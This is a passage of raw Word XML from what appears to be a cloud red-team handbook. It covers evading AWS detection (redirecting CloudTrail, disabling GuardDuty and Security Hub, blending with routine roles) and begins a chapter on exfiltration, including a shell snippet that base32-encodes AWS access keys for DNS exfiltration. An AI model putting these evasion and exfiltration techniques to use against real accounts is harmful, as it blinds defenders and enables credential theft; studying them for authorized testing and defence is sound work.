          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail:UpdateTrail</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> can change the destination S3 bucket or Logs group. If the attacker changes the destination to a bucket in an attacker account (and the bucket policy allows CloudTrail writes), the trail continues to work from the defender's point of view until somebody checks the configuration. This is a middle-risk primitive: it preserves CloudTrail's apparent liveness but gives the attacker read-only control over what the defender sees going forward. The defender's detection here is CloudTrail's </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Insights</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> feature and the Config rule </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>cloudtrail-s3-dataevents-enabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EF07299"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Disabling downstream services.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>guardduty:DeleteDetector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>guardduty:UpdateDetector --disable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>config:DeleteConfigurationRecorder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>securityhub:DisableSecurityHub</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> — each of these terminates a detection service in the region. Each produces an alert of its own in most mature organizations; they are triangulation indicators of compromise. Only use these when you have already achieved the mission objective and need to slow the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296920F0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:divId w:val="181092197"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Warning: what AWS Detective sees</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41216A5C" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EEF6FB"/>
        <w:spacing w:after="216"/>
        <w:divId w:val="181092197"/>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS Detective retains CloudTrail and VPC Flow Logs data independently of the customer's trails for a rolling 365-day window. Even if you stop or redirect CloudTrail in the victim account, Detective still has a copy — and a responder who pulls Detective on the affected role gets a forensically complete trail. The only way to deny Detective its data is to have never generated the event in the first place. This is the strongest argument for </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>blending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>log tampering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FA16BA" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.7  GuardDuty specifics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A46A61A"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GuardDuty's 2025 finding taxonomy includes five dozen distinct finding types across IAM, EC2, EKS, S3, and Lambda. Knowing which ones fire on which operator behaviours is valuable. The ones most likely to fire on a novice operator are </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>UnauthorizedAccess:IAMUser/InstanceCredentialExfiltration.OutsideAWS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (covered earlier), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Stealth:IAMUser/CloudTrailLoggingDisabled</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Recon:IAMUser/MaliciousIPCaller</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (calls from a known bad IP per the GuardDuty threat intel feed), and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Impact:IAMUser/AnomalousBehavior</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> (behavioural anomalies per the GuardDuty model). The threat-intel-driven finding in particular is under-appreciated: a call from a known Tor exit, a known bulletproof host, or a known C2 IP produces an immediate high-severity finding, and operator infrastructure must avoid these lists.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135F06B2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>16.8  Access Analyzer as a counter-evasion risk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F90869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Access Analyzer produces findings when a resource is shared with a principal outside the defined zone of trust (account, Organization, or Organization Unit). If the attacker shares a resource with an external account — the EBS snapshot sharing in Chapter 11, the ECR repository policy in Chapter 13 — Access Analyzer may produce a finding within minutes. The operator's mitigation is to choose targets that already have external-sharing patterns (snapshot-sharing is common in backup architectures; ECR cross-acc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ount is common in multi-account CI) so the new finding is not a new category but rather a new item in an already-reviewed category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="268779D0" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Key takeaways</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3658F42F" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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CloudTrail is the defender's narrative source; every evasion technique orbits it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9C7DD4" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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The lowest-risk evasion is </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>blending</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:eastAsia="Times New Roman" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>: act from high-volume roles, match region/service/volume/user-agent patterns, use automation-like session names.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4793DDD2" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Mid-risk evasion is narrowing: prefer actions that are unlogged by default, operate in regions without regional trails, avoid verbose management events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB196C9" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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High-risk evasion (stopping trails, redirecting trails, disabling GuardDuty) produces loud detections and should be reserved for end-of-mission scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF25A29" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="52"/>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AWS Detective retains CloudTrail data independently of the customer's trails; log tampering does not erase the forensic record.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6579B920" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Chapter 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:br/>
        <w:t>Data Exfiltration and Impact</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BFDF7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Exfiltration is the phase where the operator converts access into the artifact the engagement exists to produce: a demonstration of customer-data egress, a demonstration of cryptographic key theft, a demonstration of financial control. Impact is the parallel phase where the operator (with client authorization) demonstrates destructive capability: encryption of data, deletion of snapshots, account lockout. This chapter covers both under the same umbrella because they share a requirement that distinguishes th</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">em from the recon and escalation phases: defensibility. Exfiltration and impact actions are the ones most likely to attract forensic scrutiny, and the operator must be able to demonstrate, after the fact, exactly which actions were taken and which were not. The operational discipline here is not about being quieter; it is about being </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>documented</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED703D" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.1  Exfiltration categories</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FF7A5F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AWS exfiltration primitives fall into three buckets. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Service-side</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitives move data entirely inside AWS — EBS snapshot sharing (Chapter 11), S3 replication, RDS snapshot sharing, DynamoDB export, Redshift UNLOAD, Athena CTAS. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Service-to-internet</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitives move data from an AWS service to an attacker-controlled internet endpoint — Lambda with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>urllib.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, EC2 with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>curl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">, SNS HTTPS subscriptions to attacker endpoints, EventBridge API destinations. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>Out-of-band</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> primitives move data through channels AWS does not directly mediate — a shared document that later gets forwarded, a credential printed to CloudTrail and read by a downstream log aggregator, a DNS query that embeds data in the subdomain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7758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In terms of detection visibility, service-side is the quietest (the data stays on AWS's plane), service-to-internet is the loudest (VPC Flow Logs, GuardDuty's data-exfil anomaly detection), and out-of-band is the most unpredictable. Mature operators prefer service-side for bulk and service-to-internet only for small high-value pulls.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553E893" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.2  Secrets and the KMS data-key pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0E1BE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Secrets Manager and SSM Parameter Store are the two services where the operator most frequently finds credentials worth exfiltrating. Both are encrypted with KMS keys, and both produce CloudTrail events on </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>secretsmanager:GetSecretValue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>ssm:GetParameter</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>decrypt=true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>. The events are high-severity in many detection pipelines because secret reads are rare in well-tooled organizations. The operator's two countermeasures: bulk reads look exactly like a bad pattern, so target specific secrets rather than iterating through all of them; and, when possible, use a role that routinely reads the secrets in question — the application's own role is the best cover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B51583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related primitive is KMS data-key re-encryption. If the attacker holds </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Decrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a key and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>kms:Encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> on a key they control, they can decrypt data encrypted with the target key and re-encrypt it with their own key, producing an attacker-readable ciphertext that can then be exfiltrated like any other blob. This matters for envelope-encrypted objects (S3 SSE-KMS, Secrets Manager, many application-layer encryption schemes).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AB21404" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>17.3  DNS exfiltration from inside AWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6B5B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VPC Flow Logs capture L3/L4 metadata but not payload content. DNS queries from AWS VPCs pass through Route 53 Resolver, which does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Emphasis"/>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Serif Pro" w:hAnsi="Source Serif Pro"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> log queries to CloudTrail by default — Route 53 Resolver Query Logging is a separate feature that must be enabled. Absent that, an attacker inside a VPC can encode small amounts of data (credentials, short files, hashes) in DNS subdomain labels and query an attacker-controlled authoritative DNS server. The bandwidth is terrible (tens of kilobytes per minute in practice) but the detection footprint is almost nil in organizations without Query Logging enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78662CA1" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@ec2-in-victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="c"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t># encode a credential into DNS query labels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CB2610" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="p"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>attacker@ec2-in-victim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="d"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>~$</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t xml:space="preserve"> CRED=$(base32 &lt;&lt;&lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="g"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>"$AWS_ACCESS_KEY_ID:$AWS_SECRET_ACCESS_KEY"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467FD3CF" w14:textId="77777777" w:rsidR="000E759F" w:rsidRDefault="000E759F">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:divId w:val="1402480080"/>
        <w:rPr>
          <w:lang w:val="en"/>
        </w:rPr>
      </w:pPr>
